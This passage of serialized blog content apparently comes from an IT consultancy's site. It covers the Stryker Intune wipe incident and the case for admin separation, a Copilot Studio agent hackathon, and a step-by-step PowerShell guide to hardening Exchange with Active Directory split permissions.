exploitable gaps.",[809,5028,5029,5030,5035],{},"Microsoft has recently published ",[813,5031,5034],{"href":5032,"rel":5033},"https://techcommunity.microsoft.com/blog/intunecustomersuccess/best-practices-for-securing-microsoft-intune/4502117",[1509],"best practices for securing Microsoft Intune"," — a timely signal that even Microsoft considers Intune hardening a topic that needs explicit attention across the industry. Our Managed Intune service is built on exactly these principles, and we have implemented Microsoft's recommendations as part of our baseline.",[809,5037,5038],{},"Our Managed Intune service is built on the glueckkanja Intune Foundation: A set of proven, continuously maintained best practices for device management, delivered entirely as code using Terraform and our own TerraProvider. Every change is automated, version-controlled, and auditable. There are no undocumented click-through configurations that an attacker could exploit by understanding the gap between what was intended and what was set.",[809,5040,5041],{},"From a security perspective, this means Zero Trust, App Protection Policies, and Endpoint Security configurations are applied by design, consistently, across Windows, macOS, iOS, and Android, not as one-time deployments, but as continuously enforced, evergreen baselines that track Microsoft's own security guidance as it evolves.",[809,5043,5044],{},"Critically, Managed Intune reflects the operational maturity required to secure modern endpoint management: continuous compliance monitoring, structured change governance, and regular service reviews, not as optional extras, but as baseline operations. But securing the Intune configuration is only half the picture. If the administrator accessing the console does so from an unprotected device, the management plane remains exposed regardless which is exactly where the Managed Red Tenant completes the model.",[809,5046,5047],{},"Since all configurations are deployed as code based on the Intune Foundation, we enforce a strict four-eyes principle with peer review, additional automated validation, and controlled deployment pipelines. This eliminates unmanaged portal changes within the Intune Foundation and ensures a consistent, auditable, and secure baseline across all devices.",[809,5049,5050],{},"Administrative access is governed through a least-privilege model using GDAP and Azure Lighthouse, with clearly defined responsibilities and tightly scoped access to the customer tenant. This significantly reduces the attack surface associated with privileged operations.",[809,5052,5053],{},"Device-level actions, including destructive operations, remain under customer responsibility, as their execution is tightly coupled to organization-specific processes and internal governance frameworks. Microsoft and CISA recommend securing such actions through additional safeguards, such as multi-admin approval controls within Intune.",[819,5055,5057],{"id":5056},"the-uncomfortable-question","The uncomfortable question",[809,5059,825],{},[809,5061,5062],{},"The Stryker attack is not an indictment of Microsoft Intune. Intune behaved exactly as designed. It executed the commands it received from an authenticated administrator. The failure was not in the tool. It was in the absence of controls around who could reach that tool, from what context, and with what level of authorization.",[809,5064,5065],{},"That is a governance and architecture problem. And it is the same problem that exists in most organizations running Microsoft 365 today.",[809,5067,5068],{},"If your administrators access Intune, Entra ID, or Azure from the same devices and identities they use for everyday work and if your Intune environment has grown through years of manual portal changes rather than a structured, automated operating model, you are carrying the same structural risk that Stryker carried on March 10th. The question is whether an adversary will find that exposure before you address it.",[809,5070,5071,5073,5074,5076],{},[813,5072,396],{"href":399}," addresses the privilege and identity layer. ",[813,5075,45],{"href":48}," addresses the configuration and operational layer. Together, they close the two gaps that made the Stryker attack possible.",[809,5078,5079],{},"If you want to understand how either service maps to your current environment, or where your specific exposure points are, we are happy to talk through it.",[809,5081,5082],{},"We will also be publishing a deep-dive article shortly, examining how the Stryker incident was able to happen in the first place.",[819,5084,5086],{"id":5085},"further-information","Further information",[809,5088,825],{},[1648,5090,5091,5098,5104,5111],{},[1652,5092,5093],{},[813,5094,5097],{"href":5095,"rel":5096},"https://www.cisa.gov/secure-cloud-business-applications",[1509],"CISA: Securing Cloud Business Applications",[1652,5099,5100],{},[813,5101,5103],{"href":5032,"rel":5102},[1509],"Microsoft: Best practices for securing Microsoft Intune",[1652,5105,5106],{},[813,5107,5110],{"href":5108,"rel":5109},"https://techcrunch.com/2026/03/19/cisa-urges-companies-to-secure-microsoft-intune-systems-after-hackers-mass-wipe-stryker-devices/?utm_campaign=social",[1509],"TechCrunch: CISA urges companies to secure Microsoft Intune systems after hackers mass-wipe Stryker devices",[1652,5112,5113],{},[813,5114,5117],{"href":5115,"rel":5116},"https://marketplace.microsoft.com/de-de/product/saas/glueckkanja-gabag.redtenant?tab=overview",[1509],"Managed Red Tenant on Azure Marketplace",{"title":927,"searchDepth":928,"depth":928,"links":5119},[5120,5121,5122,5123,5124,5128,5129],{"id":4894,"depth":928,"text":4895},{"id":4909,"depth":928,"text":4910},{"id":4927,"depth":928,"text":4928},{"id":4939,"depth":928,"text":4940},{"id":4954,"depth":928,"text":4955,"children":5125},[5126,5127],{"id":4969,"depth":935,"text":4970},{"id":5014,"depth":935,"text":5015},{"id":5056,"depth":928,"text":5057},{"id":5085,"depth":928,"text":5086},{"lang":940,"seoTitle":5131,"titleClass":942,"date":5132,"categories":5133,"blogtitlepic":5134,"socialimg":5135,"customExcerpt":5136,"keywords":5137,"hreflang":5138,"asideNav":5145,"contactInContent":5160,"maxContent":752,"published":511},"The Stryker Attack: How a Compromised Admin Account Wiped 80,000 Devices via Intune","2026-03-20",[373],"head-stryker.jpg","/blog/heads/head-stryker.jpg","On March 11, 2026, Handala wiped devices across 79 countries using nothing but a compromised Intune admin account. No malware, no exploit, just legitimate management tooling turned into a weapon. Here is what happened, why it worked, and how the two architectural gaps that made it possible can be closed.","Stryker attack, Handala, Microsoft Intune wipe, privileged access management, admin workstation, Managed Red Tenant, Managed Intune, Zero Trust, Privileged Admin Workstation, PAW, Enterprise Access Model, CISA, endpoint management security",[5139,5141,5143],{"lang":4,"href":5140},"/de/posts/2026-03-20-stryker-attack-intune-privilege",{"lang":1028,"href":5142},"/es/posts/2026-03-20-stryker-attack-intune-privilege",{"lang":940,"href":5144},"/en/posts/2026-03-20-stryker-attack-intune-privilege",{"menuItems":5146},[5147,5149,5151,5153,5156,5158],{"href":5148,"text":4895},"#what-actually-happened",{"href":5150,"text":4910},"#why-this-attack-succeeded",{"href":5152,"text":4928},"#cisa-has-seen-enough",{"href":5154,"text":5155},"#separation-is-not-a-luxury-it-is-the-control","Separation is not a luxury",{"href":5157,"text":4955},"#two-layers-of-defense",{"href":5159,"text":5057},"#the-uncomfortable-question",{"quote":511,"infos":5161},{"bgColor":952,"headline":2303,"subline":5162,"level":819,"textStyling":956,"flush":957,"person":5163,"form":5165},"Want to know how Managed Red Tenant and Managed Intune close the gaps the Stryker attack exploited? Fill out the form and we'll walk you through how it maps to your environment.",{"image":1895,"cloudinary":511,"alt":960,"name":961,"quotee":961,"quoteeTitle":962,"quote":5164},"The Stryker attack is a wake-up call for every organization running Microsoft Intune. The tool did exactly what it was told. The problem was that no one should have been able to tell it that — not from a compromised everyday account, not without a second approval, not without an isolated administrative environment. That is the gap we help organizations close.",{"ctaText":976,"cta":5166,"method":938,"action":979,"fields":5167},{"skin":978},[5168,5169,5170,5171,5172,5173,5175,5176,5177,5179,5180,5181],{"type":982,"id":983,"value":984},{"label":986,"type":987,"id":988,"required":511,"requiredMsg":989},{"label":991,"type":987,"id":615,"required":511,"requiredMsg":992},{"label":994,"type":995,"id":995,"required":511,"requiredMsg":996},{"label":998,"type":999,"id":1000,"required":752,"requiredMsg":1001},{"label":5174,"type":1004,"id":1005,"required":511,"requiredMsg":1006},"Your data will be stored and used to respond to your request. For more details, please see our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.",{"type":982,"id":1008,"value":373},{"type":982,"id":1010,"value":2327},{"type":982,"id":1013,"value":5178},"Form: Blog Stryker Attack Intune Privilege | EN",{"type":982,"id":1016,"value":1017},{"type":982,"id":1019},{"type":982,"id":1021},"/posts/2026-03-20-stryker-attack-intune-privilege",{"title":4882,"description":4888},"posts/2026-03-20-stryker-attack-intune-privilege",[103,5186,1794],"Privileged Access","UUvRfCpIQm2f54X3IE4ubTDTKGwl0wZjtbYt5z4CLMk",{"id":5189,"title":5190,"author":5191,"body":5192,"cta":767,"description":5196,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":5228,"moment":5230,"navigation":511,"path":5243,"seo":5244,"stem":5245,"tags":5246,"webcast":752,"__hash__":5250},"content_en/posts/2026-03-16-ai-agent-hackathon.md","Six Agents. Four Weeks. Real Production.",[804],{"type":806,"value":5193,"toc":5226},[5194,5197,5200,5203,5206,5209,5214,5217,5220,5223],[809,5195,5196],{},"How many hours does your IT department spend each week on tasks an agent could handle in minutes?",[809,5198,5199],{},"There is a type of process that almost every IT department in German companies knows: someone reads contracts. Someone else sorts requirements into categories. Yet another person answers the same questions about deliveries that someone already answered yesterday. These are not glamorous problems. But they are the ones that collectively cost tens of thousands of hours per year — and they are surprisingly well-suited for AI agents, if you know where to apply the lever.",[809,5201,5202],{},"Six companies did exactly that in February at our office in Offenbach. Kiekert now categorizes R&D requirements using rule-based logic, with a confidence score and a feedback loop. The agent is already running in production. Dr. Oetker built a Contract Review Assistant that checks IT contracts for critical clauses and generates a structured review report for procurement and legal. Eckes-Granini entered with two agents: an onboarding agent that guides new employees through MFA, Office setup, and security policies from their first login, and a logistics agent that answers dispatchers' questions about shipments, rates, and carriers. igefa developed a voice-based hotline agent for internal IT support, connected to JIRA and Confluence. And lila logistik brought perhaps the most unusual project: a use case generator that monitors SharePoint and Exchange to identify automation potential — because the real problem is often not the technology, but that no one in the organization recognizes the right places to automate.",[809,5204,5205],{},"All of this was built in Copilot Studio, with Agent Flows, Dataverse connections and MCP connectors, supported by four of our MVPs. Four weeks of building, alongside regular day-to-day business. Participants had to carve out every hour for it, between tickets, quarterly closes, and operational demands. That six working agents stood at the end says less about the technology than about the teams who built them.",[809,5207,5208],{},"On March 10th at the Microsoft Office Frankfurt came the final test: six presentations, 20 minutes each, judged on business impact, technical depth, and audience applause (yes, that is also on the scoring sheet). Kiekert won because their agent is running in production, built by someone from the business unit — no IT background, no prior experience with Copilot Studio. Dr. Oetker won because contract review is so universal that the jury started thinking about their own IT contracts afterwards. That all six teams built a working agent in four weeks alongside their regular workload — that was ultimately the real news of the day.",[4998,5210],{"thumb":5211,"alt":5212,"id":5213,":full-width":2391},"/thumbs/thumb-ai-agent-hackathon.jpg","Presentation of the glueckkanja AI Agent Hackathon at Microsoft Office Frankfurt: six teams presenting their Copilot Studio agents to an audience.","GjumQAnKj8k",[2489,5215,5216],{"style":5005},"glueckkanja AI Agent Hackathon – Six companies, six agents, four weeks",[809,5218,5219],{},"The format is called the glueckkanja AI Agent Hackathon. It grew out of a Microsoft Hackathon in Munich where we participated with Knorr-Bremse. Microsoft then asked us to continue the format with our customers. The idea is simple: companies apply with a concrete process that is currently manual. We sharpen the use case, define the architecture, and build together. For those not ready to jump straight into the hackathon: we also offer workshops to identify use cases and prepare the agent architecture — either as an entry point or as a standalone format.",[809,5221,5222],{},"The next glueckkanja AI Agent Hackathon starts in fall 2026. Registration is open. If you want to identify use cases and prepare your environment beforehand: we are happy to help. Reach out to us.",[809,5224,5225],{},"Thank you to Sylvia and Miriam from Microsoft for their trust in the format. To Kiekert, Dr. Oetker, Eckes-Granini, igefa and lila logistik for their courage and commitment. And to our glueckkanja team for making it happen.",{"title":927,"searchDepth":928,"depth":928,"links":5227},[],{"lang":940,"seoTitle":5229,"titleClass":942,"date":5230,"categories":5231,"blogtitlepic":5232,"socialimg":5233,"customExcerpt":5234,"keywords":5235,"hreflang":5236,"published":511},"glueckkanja AI Agent Hackathon: Six Companies Build AI Agents with Copilot Studio","2026-03-16",[945],"head-ai-agent-hackathon.jpg","/blog/heads/head-ai-agent-hackathon.jpg","Six companies, four weeks of building, six working AI agents — that was the first glueckkanja AI Agent Hackathon. Kiekert, Dr. Oetker, Eckes-Granini, igefa and lila logistik built agents in Copilot Studio that are running in production today. Here is what was built and how the format works.","AI Agent Hackathon, Copilot Studio, glueckkanja, AI Agents, Microsoft Copilot, Agent Flows, Dataverse, MCP Connector, Kiekert, Dr. Oetker, Eckes-Granini, igefa, lila logistik, AI automation, enterprise AI, process automation",[5237,5239,5241],{"lang":4,"href":5238},"/de/posts/2026-03-16-ai-agent-hackathon",{"lang":940,"href":5240},"/en/posts/2026-03-16-ai-agent-hackathon",{"lang":1028,"href":5242},"/es/posts/2026-03-16-ai-agent-hackathon","/posts/2026-03-16-ai-agent-hackathon",{"title":5190,"description":5196},"posts/2026-03-16-ai-agent-hackathon",[1792,5247,5248,5249],"Copilot Studio","Hackathon","AI Agents","VuB26eKvl5GKvXlqZw6ERkulCKwNYWkUb1buWbKpsBY",{"id":5252,"title":5253,"author":5254,"body":5255,"cta":767,"description":927,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":5912,"moment":5914,"navigation":511,"path":5939,"seo":5940,"stem":5941,"tags":767,"webcast":752,"__hash__":5942},"content_en/posts/2026-03-01-exchange-ad-split-permissions-hardening.md","Exchange AD Split Permissions without regrets",[1112],{"type":806,"value":5256,"toc":5899},[5257,5261,5264,5270,5275,5291,5294,5299,5302,5306,5314,5328,5334,5337,5342,5378,5401,5405,5413,5421,5426,5442,5446,5452,5456,5461,5519,5524,5561,5564,5568,5582,5589,5605,5614,5618,5621,5667,5670,5679,5688,5691,5706,5723,5736,5748,5753,5812,5816,5821,5841,5848,5872,5876,5879,5882,5896],[819,5258,5260],{"id":5259},"tldr-what-if-we-remove-the-downsides","TLDR: what if we remove the downsides?",[809,5262,5263],{},"I found a way to re-grant AD and RBAC permissions directly where Exchange users, groups, and contacts reside, requiring no changes for admins or identity management systems. In my experience, that friction has been the primary blocker for most companies. And we still retain the security benefits against lateral movement and domain compromise.",[809,5265,5266],{},[838,5267],{"alt":5268,"src":5269},"Active Directory","https://res.cloudinary.com/c4a8/image/upload/v1770991330/blog/pics/Blog_-_Exchange_AD_Split_Permissions_-_1.png",[809,5271,5272],{},[1655,5273,5274],{},"It’s achieved in three steps:",[5276,5277,5278,5285,5288],"ol",{"style":1650},[1652,5279,5280,5281],{},"Implement ",[813,5282,5284],{"href":5283},"https://learn.microsoft.com/en-us/exchange/permissions/split-permissions/configure-exchange-for-split-permissions#switch-to-active-directory-split-permissions","AD split permission model",[1652,5286,5287],{},"Grant Exchange servers the lost AD permissions, but only on the relevant OUs",[1652,5289,5290],{},"Grant Exchange RBAC to re-enable missing PowerShell cmdlets",[809,5292,5293],{},"All via Microsoft’s guidance, AD ACLs or Exchange RBAC assignments.",[4998,5295],{"thumb":5296,"alt":5297,"id":5298,":full-width":2391},"/thumbs/thumb-exchange-ad-split-permissions-webcast.jpg","A presenter sits in front of a laptop explaining a slide titled Step 1: Active Directory Permissions by glueckkanja. The slide covers how to implement Microsoft Exchange AD Split Permissions, including PowerShell commands for creating a delegation group (New-ADGroup, Add-ADGroupMember) and applying permissions via the script Add-ExchangeADSplitPermissionOnOU.ps1.","soNZkNRopSQ",[2489,5300,5301],{"style":5005},"Webcast: Exchange AD Split Permissions without regrets. A Step-by-step implementation guide",[819,5303,5305],{"id":5304},"why-do-we-care-now","Why do we care (now)?",[809,5307,5308,5309,5311,5313],{},"It has been largely overlooked or ignored since it was introduced with Exchange 2010 SP1. But the default shared permissions model represents a big security risk of Active Directory takeover. Combined with Exchange being notorious for remote exploits the last few years, it’s time to act!",[2959,5310],{},[2959,5312],{},"\nThe problem originates from privileges granted to the root of a domain that get inherited throughout the domain.",[1648,5315,5316,5319,5322,5325],{"style":1650},[1652,5317,5318],{},"modify permissions on users and groups (effectively full access)",[1652,5320,5321],{},"modify group members",[1652,5323,5324],{},"reset password on users",[1652,5326,5327],{},"create/delete users and groups",[809,5329,5330],{},[838,5331],{"alt":5332,"src":5333},"Permissions","https://res.cloudinary.com/c4a8/image/upload/v1770991330/blog/pics/Blog_-_Exchange_AD_Split_Permissions_-_2.png",[809,5335,5336],{},"Only certain highly privileged Tier 0 users and groups are protected by the AdminSDHolder process (attribute admincount=1) and in many environments there will be unprotected users or groups that could allow compromise of the domain and/or forest or at least cause serious impact.",[809,5338,5339],{},[1655,5340,5341],{},"Prominent examples:",[1648,5343,5344,5347,5367],{"style":1650},[1652,5345,5346],{},"Entra Connect Sync account when using Password Hash Sync",[1652,5348,5349,5350],{},"Default groups",[1648,5351,5353,5356,5364],{"style":5352},"margin: 0",[1652,5354,5355],{},"Allowed RODC Password Replication Group together with Entra Connect account (if a real Windows RODC exists)",[1652,5357,5358,5359,5363],{},"Also see ",[813,5360,5362],{"href":5361,"target":516},"https://specterops.io/blog/2025/06/25/untrustworthy-trust-builders-account-operators-replicating-trust-attack-aorta","Untrustworthy Trust Builders: Account Operators Replicating Trust Attack (AORTA) - SpecterOps"," showing more paths (Account Operators group is a similar threat)",[1652,5365,5366],{},"Emptying Protected Users to create attack vectors by removing protections",[1652,5368,5369,5370],{},"Unprotected custom groups or admin/service accounts",[1648,5371,5372,5375],{"style":5352},[1652,5373,5374],{},"Write permission on GPOs (applying to domain controller)",[1652,5376,5377],{},"Managing access to AD backups, backup server, PKI templates, hypervisor, ...",[809,5379,5380,5381,5383,5385,5386,5391,5393,5395,5396],{},"It is very hard to retroactively contain all these current and future potential pathways. For the _ADM custom OU, you could disable ACL inheritance, but most default objects may not be moved from the default Builtin OU or Users container and remain vulnerable.",[2959,5382],{},[2959,5384],{},"\nIt is much better to remove the powerful permissions from the root, which is done by implementing the Active Directory split permissions model. ",[813,5387,5390],{"href":5388,"rel":5389},"https://learn.microsoft.com/en-us/exchange/permissions/split-permissions/configure-exchange-for-split-permissions",[1509],"Configure Exchange Server for split permissions | Microsoft Learn",[2959,5392],{},[2959,5394],{},"\nAnd Microsoft agrees “…encouraged to implement Active Directory split permissions” ",[813,5397,5400],{"href":5398,"rel":5399},"https://techcommunity.microsoft.com/blog/coreinfrastructureandsecurityblog/active-directory-hardening-series---part-7-%E2%80%93-implementing-least-privilege/4366626",[1509],"Active Directory Hardening Series - Part 7 – Implementing Least Privilege | Microsoft Community Hub",[819,5402,5404],{"id":5403},"but-why-is-no-one-doing-it","But why is no one doing it?",[809,5406,5407,5408,5410,5412],{},"As split permissions weren’t available until Exchange 2010 SP1, everyone had accepted it by then and it seems that security teams did not manage to push it successfully once it existed.",[2959,5409],{},[2959,5411],{},"\nAnd it would have forced changes to admin and IDM processes, like creating users or distribution lists in AD first and only afterwards using Exchange to “mail enable” them.",[892,5414,5415],{},[809,5416,5417,5420],{},[1655,5418,5419],{},"Info:"," The following cmdlets will no longer be available or working: Add-DistributionGroupMember, New-DistributionGroup, New-Mailbox, New-MailContact, New-MailUser, New-RemoteMailbox, Remove-DistributionGroup, Remove-DistributionGroupMember, Remove-Mailbox, Remove-MailContact, Remove-MailUser, Remove-RemoteMailbox, Update-DistributionGroupMember, Add-ADPermission, Remove-ADPermission",[809,5422,5423],{},[1655,5424,5425],{},"Adoption examples:",[1648,5427,5428,5439],{"style":1650},[1652,5429,5430,5431],{},"New-Mailbox (where Exchange writes to AD) would be:",[1648,5432,5433,5436],{"style":5352},[1652,5434,5435],{},"New-ADUser (where adm.jdoe writes to AD)",[1652,5437,5438],{},"Enable-Mailbox",[1652,5440,5441],{},"Add-ADPermission for SendAs rights would have to be done via AD users and computers in the security tab and often requiring additional AD permissions for standard admins.",[819,5443,5445],{"id":5444},"show-me-this-no-regrets-option","Show me this no-regrets option!",[809,5447,5448,5451],{},[1655,5449,5450],{},"Disclaimer",": Please fully read and understand the following links and articles, perform it in a test environment first, make sure AD backups are current and recovery practices are established!",[897,5453,5455],{"id":5454},"audit-current-usage","Audit current usage",[809,5457,5458],{},[1655,5459,5460],{},"You should first check which of the affected cmdlets are in use on which OUs:",[2952,5462,5463,5470,5472,5478,5480],{},[919,5464,5465,5469],{},[919,5466,5468],{"style":5467},"color:var(--color-gk-orange)","$CsvPath"," = \"C:\\temp\\SplitPermissionAdminAuditLog.csv\"",[2959,5471],{},[919,5473,5474,5477],{},[919,5475,5476],{"style":5467},"$Cmdlets"," = \"Add-ADPermission\",\"Remove-ADPermission\",\"New-DistributionGroup\",\"Remove-DistributionGroup\",\"Add-DistributionGroupMember\",\"Update-DistributionGroupMember\",\"Remove-DistributionGroupMember\",\"New-Mailbox\",\"Remove-Mailbox\",\"New-RemoteMailbox\",\"Remove-RemoteMailbox\",\"New-MailUser\",\"Remove-MailUser\",\"New-MailContact\",\"Remove-MailContact\"",[2959,5479],{},[919,5481,5482,1658,5485,5489,5490,1658,5493,5495,5496,5499,5500,1658,5503,1658,5506,1658,5508,5511,5512,5515,5516],{},[919,5483,5484],{"style":5467},"Search-AdminAuditLog",[919,5486,5488],{"style":5487},"color:var(--color-gk-mid-blue)","-ResultSize"," 99000 ",[919,5491,5492],{"style":5487},"-Cmdlets",[919,5494,5476],{"style":5467}," | ",[919,5497,5498],{"style":5467},"Select-Object"," RunDate,Caller,ObjectModified,CmdletName,@{Name='CmdletParameters';Expression={[string]::join(\",\", ($\\_.CmdletParameters))}},succeeded,error | ",[919,5501,5502],{"style":5467},"Export-Csv",[919,5504,5505],{"style":5487},"-Path",[919,5507,5468],{"style":5467},[919,5509,5510],{"style":5487},"-Delimiter"," \";\" ",[919,5513,5514],{"style":5487},"-Encoding"," Unicode ",[919,5517,5518],{"style":5487},"-NoTypeInformation",[809,5520,5521],{},[1655,5522,5523],{},"Quick Analysis of caller and cmdlets:",[2952,5525,5526,5542,5544,5552,5554],{},[919,5527,5528,5531,5532,1658,5535,1658,5537,1658,5539,5541],{},[919,5529,5530],{"style":5467},"$CSVs"," = ",[919,5533,5534],{"style":5467},"Import-Csv",[919,5536,5505],{"style":5487},[919,5538,5468],{"style":5467},[919,5540,5510],{"style":5487}," \";\"",[2959,5543],{},[919,5545,5546,5495,5548,5551],{},[919,5547,5530],{"style":5467},[919,5549,5550],{"style":5467},"Group-Object"," Caller",[2959,5553],{},[919,5555,5556,5495,5558,5560],{},[919,5557,5530],{"style":5467},[919,5559,5550],{"style":5467}," CmdletName",[809,5562,5563],{},"Analyze the CSV for where AD permissions will be needed. Potentially optimize by moving all Exchange-relevant groups into dedicated OUs.",[819,5565,5567],{"id":5566},"enable-split-permissions-model","Enable Split Permissions Model",[809,5569,5570,5571,5574,5575,5579],{},"Follow Microsoft's instructions ",[1655,5572,5573],{},"\"Switch to Active Directory split permissions\""," in\n",[813,5576,5390],{"href":5577,"rel":5578},"https://learn.microsoft.com/en-us/exchange/configure-exchange-server-for-split-permissions",[1509],[848,5580,5581],{},"(NOT RBAC split permissions)",[809,5583,5584,5585,5588],{},"In essence, it will remove the dangerous permissions of the ",[1655,5586,5587],{},"\"Exchange Windows Permissions\""," group and also remove Exchange as a group member.",[2952,5590,5591],{},[919,5592,5593,1658,5596,1658,5599,1658,5602],{},[919,5594,5595],{"style":5467},"Setup.exe",[919,5597,5598],{"style":5487},"/IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF",[919,5600,5601],{"style":5487},"/PrepareAD",[919,5603,5604],{"style":5487},"/ActiveDirectorySplitPermissions:true",[2489,5606,895,5608,5610,5611],{"style":5607},"background:#f4f4f4; border-left:4px solid var(--color-gk-petrol); border-radius:0 6px 6px 0; padding:0.75rem 1rem; margin:1rem 0; font-size:0.88rem; color:#000520;",[1655,5609,5419],{}," To revert back, simply use ",[2499,5612,5613],{},"/ActiveDirectorySplitPermissions:false",[897,5615,5617],{"id":5616},"grant-ad-permissions","Grant AD Permissions",[809,5619,5620],{},"Create a custom AD group and make Exchange servers members.",[2952,5622,5623,5629,5631,1658,5634,5637,5638,5641,5642,5645,5646,1658,5648,1658,5651,5654,5655,5657,5637,5660,5663,5664],{},[919,5624,5625],{},[919,5626,5628],{"style":5627},"color:var(--color-black-40)","# adjust OU Path first!",[2959,5630],{},[919,5632,5633],{"style":5467},"New-ADGroup",[919,5635,5636],{"style":5487},"-Name"," \"AD_Custom Exchange Split permissions replacement\" ",[919,5639,5640],{"style":5487},"-GroupCategory"," Security ",[919,5643,5644],{"style":5487},"-GroupScope"," DomainLocal ",[919,5647,5505],{"style":5487},[1655,5649,5650],{},"\"OU=Rights,OU=Groups,OU=T1,OU=_ADM,$((Get-ADDomain).DistinguishedName)\"",[919,5652,5653],{"style":5487},"-Description"," \"replaces the permissions lost by split permissions on relevant OUs\"",[2959,5656],{},[919,5658,5659],{"style":5467},"Add-ADGroupMember",[919,5661,5662],{"style":5487},"-Members"," \"Exchange Trusted Subsystem\"\n",[919,5665,5666],{"style":5627},"# reboot Exchange servers for permissions via group to work",[809,5668,5669],{},"I’ve created a script to make delegating the AD permissions easy per use case.",[892,5671,5672],{},[809,5673,5674,5675,5678],{},"Without these permissions the Exchange server would receive the error ",[2499,5676,5677],{},"“INSUFF_ACCESS_RIGHTS”"," from AD.",[809,5680,5681,5682,5687],{},"Download ",[813,5683,5686],{"href":5684,"rel":5685},"https://github.com/glueckkanja/code-snippets/blob/main/ExchangeADSplitPermission/Add-ExchangeADSplitPermissionOnOU.ps1",[1509],"Add-ExchangeADSplitPermissionOnOU.ps1"," from glueckkanja GitHub",[809,5689,5690],{},"It can grant the following PermissionTypes:",[809,5692,5694,5697,5699,5700,5702],{"style":5693},"background:#f5f5f5;padding:0.5rem 1rem;margin:0.25rem 0;border-left:3px solid #d8d8d8;",[1655,5695,5696],{},"CreateUserAndContact",[2959,5698],{},"Create/delete, ResetPassword and WriteAllProperties for Users and Contacts",[2959,5701],{},[5703,5704,5705],"small",{},"Exchange cmdlets: `New-Mailbox`, `New-RemoteMailbox`, `New-MailUser`, `New-MailContact` and matching `Remove-*`",[809,5707,5709,5712,5714,5715,5717],{"style":5708},"background:#f5f5f5;padding:0.5rem 1rem;margin:0.25rem 0;border-left:3px solid #d8d8d8",[1655,5710,5711],{},"GroupManage",[2959,5713],{},"Create/Delete Groups, Modify Member",[2959,5716],{},[5703,5718,5719,5720,5722],{},"Exchange cmdlets: `New-DistributionGroup`, `Remove-DistributionGroup`, `Add-DistributionGroupMember`, `Update-DistributionGroupMember`, `Remove-DistributionGroupMember`",[2959,5721],{},"Also: user managing DistributionGroups they own via EAC",[809,5724,5725,5728,5730,5731,5733],{"style":5708},[1655,5726,5727],{},"UserSendAs",[2959,5729],{},"Modify AD Permissions on Users",[2959,5732],{},[5703,5734,5735],{},"Exchange cmdlet: `Add-ADPermission`",[809,5737,5738,5741,5743,5744,5746],{"style":5708},[1655,5739,5740],{},"GroupSendAs",[2959,5742],{},"Modify AD Permissions on Groups",[2959,5745],{},[5703,5747,5735],{},[809,5749,5750],{},[1655,5751,5752],{},"How to use the script:",[2952,5754,5755,1658,5757,5760,5761,5764,5765,5768,5769,5772,5774,1658,5776,5778,5779,5781,5782,5768,5784,1658,5786,5778,5788,5790,5791,5768,5793,1658,5795,5797,5798,5800,5801,5768,5803,1658,5805,5797,5807,5809,5810,5768],{},[919,5756,5686],{"style":5467},[919,5758,5759],{"style":5487},"-TargetOU"," \u003COU> ",[919,5762,5763],{"style":5487},"-PermissionType"," \u003CGroupManage|UserSendAs|GroupSendAs|CreateUserAndContact> ",[919,5766,5767],{"style":5487},"-Trustee"," \"AD_Custom Exchange Split permissions replacement\"\n",[919,5770,5771],{"style":5627},"# For example",[2959,5773],{},[919,5775,5686],{"style":5467},[919,5777,5759],{"style":5487}," \"OU=ExchangeGroups,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" ",[919,5780,5763],{"style":5487}," GroupManage ",[919,5783,5767],{"style":5487},[919,5785,5686],{"style":5467},[919,5787,5759],{"style":5487},[919,5789,5763],{"style":5487}," GroupSendAs ",[919,5792,5767],{"style":5487},[919,5794,5686],{"style":5467},[919,5796,5759],{"style":5487}," \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" ",[919,5799,5763],{"style":5487}," UserSendAs ",[919,5802,5767],{"style":5487},[919,5804,5686],{"style":5467},[919,5806,5759],{"style":5487},[919,5808,5763],{"style":5487}," CreateUserAndContact ",[919,5811,5767],{"style":5487},[897,5813,5815],{"id":5814},"grant-exchange-rbac","Grant Exchange RBAC",[809,5817,5818],{},[1655,5819,5820],{},"Re-enable -BypassSecurityGroupManagerCheck parameter for Add-DistributionGroupMember and Remove-DistributionGroupMember cmdlets:",[2952,5822,5823],{},[919,5824,5825,1658,5828,5830,5831,5834,5835,5837,5838,5840],{},[919,5826,5827],{"style":5467},"New-RoleGroup",[919,5829,5636],{"style":5487}," \"SplitPermission Security Group Creation and Membership\" ",[919,5832,5833],{"style":5487},"-Roles"," \"Security Group Creation and Membership\" ",[919,5836,5662],{"style":5487}," \"Organization Management\",\"Recipient Management\" ",[919,5839,5653],{"style":5487}," \"Brings back -BypassSecurityGroupManagerCheck to Add-DistributionGroupMember, but also needs AD ACL for Exchange Server on target DLs\"",[892,5842,5843],{},[809,5844,5845,5847],{},[1655,5846,5419],{}," Else you get \"-BypassSecurityGroupManagerCheck parameter is not available\" or \"You don't have sufficient permissions. This operation can only be performed by a manager of the group\"",[809,5849,5850,5852,5855,5857],{},[2959,5851],{},[1655,5853,5854],{},"Re-enable New-Mailbox, New-RemoteMailbox, New-MailContact, Remove-... cmdlets with needed parameters:",[2959,5856],{},[2952,5858,5859,1658,5861,5863,5864,5866,5867,5837,5869,5871],{},[919,5860,5827],{"style":5467},[919,5862,5636],{"style":5487}," \"SplitPermission Mail Recipient Creation\" ",[919,5865,5833],{"style":5487}," \"Mail Recipient Creation\" ",[919,5868,5662],{"style":5487},[919,5870,5653],{"style":5487}," \"Brings back New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and matching Remove-... cmdlets, but additionally Exchange needs AD ACL for Exchange Server on target OUs\"",[819,5873,5875],{"id":5874},"conclusions","Conclusions",[809,5877,5878],{},"I hope this guide helps more organizations take the important step of securing their Active Directory against compromise via Exchange. In my experience implementing the Exchange AD Split Permissions model across multiple customers, I have not encountered any issues and the adoption has been smooth.",[809,5880,5881],{},"I also hope Microsoft will introduce a native, OU-based approach to achieve this level of granularity, rather than the current all-or-nothing model, which would make widespread adoption significantly easier.",[809,5883,5884,5885,4306,5890,5895],{},"A note on AD Tiering: Please do not log on to Exchange servers with Domain Admin or any other Tier 0 accounts. Treat Exchange servers as Tier 1 and implement AD Tiering as soon as possible. As a first step, I recommend using 